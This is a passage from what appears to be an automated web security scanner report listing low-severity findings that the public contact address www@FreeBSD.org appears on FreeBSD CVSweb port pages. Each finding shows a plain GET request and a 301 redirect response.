<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.189. http://www.freebsd.org/cgi/cvsweb.cgi/ports/mail/alpine

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/mail/alpine

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/mail/alpine HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/mail/alpine/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:27 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7102

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.190. http://www.freebsd.org/cgi/cvsweb.cgi/ports/mail/claws-mail

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/mail/claws-mail

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/mail/claws-mail HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/mail/claws-mail/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:28 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7106

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.191. http://www.freebsd.org/cgi/cvsweb.cgi/ports/mail/lmtp2nntp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/mail/lmtp2nntp

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/mail/lmtp2nntp HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/mail/lmtp2nntp/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:29 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7105

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.192. http://www.freebsd.org/cgi/cvsweb.cgi/ports/net/pear-Net_NNTP

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/net/pear-Net_NNTP

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/net/pear-Net_NNTP HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/net/pear-Net_NNTP/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:09 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7108

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.193. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/atp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/atp

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/atp HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/atp/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:21:57 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7099

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.194. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/aub

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/aub

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/aub HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/aub/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:21:57 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7099

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.195. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/bgrab

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/bgrab

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/bgrab HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/bgrab/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:21:57 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7101

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.196. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/brag

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/brag

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/brag HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/brag/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:21:57 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7100

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.197. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/c-nocem

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/c-nocem

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/c-nocem HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/c-nocem/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:21:57 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7103

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.198. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/cg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/cg

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/cg HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/cg/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:21:57 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7098

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.199. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/cleanfeed

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/cleanfeed

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/cleanfeed HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/cleanfeed/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:22:44 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7105

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.200. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/crashmail

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/crashmail

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/crashmail HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/crashmail/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:22:47 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7105

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.201. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/dnews

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/dnews

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/dnews HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/dnews/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:22:49 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7101

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.202. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/fidogate

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/fidogate

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/fidogate HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/fidogate/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:23:09 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.203. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/fidogate-ds

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/fidogate-ds

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/fidogate-ds HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/fidogate-ds/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:23:43 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7107

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.204. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/golded+

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/golded+

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/golded+ HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/golded%2B/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:24:30 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7105

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.205. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/gup

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/gup

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/gup HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/gup/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:24:34 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7099

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.206. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/hellanzb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/hellanzb

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/hellanzb HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/hellanzb/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:25:27 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.207. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-base

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/husky-base

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/husky-base HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/husky-base/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:25:28 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7106

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.208. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-base-devel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/husky-base-devel

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/husky-base-devel HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/husky-base-devel/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:25:49 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7112

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.209. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-bsopack

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/husky-bsopack

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/husky-bsopack HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/husky-bsopack/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:25:53 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7109

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.210. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-fidoconf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/husky-fidoconf

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/husky-fidoconf HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/husky-fidoconf/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:25:52 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7110

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.211. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-fidoconf-devel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/husky-fidoconf-devel

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/husky-fidoconf-devel HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/husky-fidoconf-devel/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:25:55 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7116

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.212. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-hpt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/husky-hpt

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/husky-hpt HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/husky-hpt/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:25:56 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7105

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.213. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-hpt-devel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/husky-hpt-devel

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/husky-hpt-devel HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/husky-hpt-devel/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:26:19 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7111

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.214. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-hptkill

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/husky-hptkill

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/husky-hptkill HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/husky-hptkill/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:26:30 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7109

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.215. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-hptsqfix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/husky-hptsqfix

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/husky-hptsqfix HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/husky-hptsqfix/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:26:53 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7110

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.216. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-hpucode

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/husky-hpucode

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/husky-hpucode HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
